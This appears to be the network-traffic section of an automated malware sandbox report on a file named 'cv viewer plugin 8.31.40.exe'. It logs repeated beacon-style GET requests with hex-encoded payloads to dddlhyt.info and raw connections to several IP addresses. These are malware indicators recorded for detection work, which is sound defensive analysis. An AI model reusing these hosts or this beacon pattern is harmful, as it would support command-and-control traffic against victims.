        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.226
        Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.226
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.226
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.226
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.226
        Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.226
        Source: unknownUDP traffic detected without corresponding DNS query: 91.211.247.248
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016A2B95 WSASetLastError,WSARecv,WSASetLastError,select,7_2_016A2B95
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
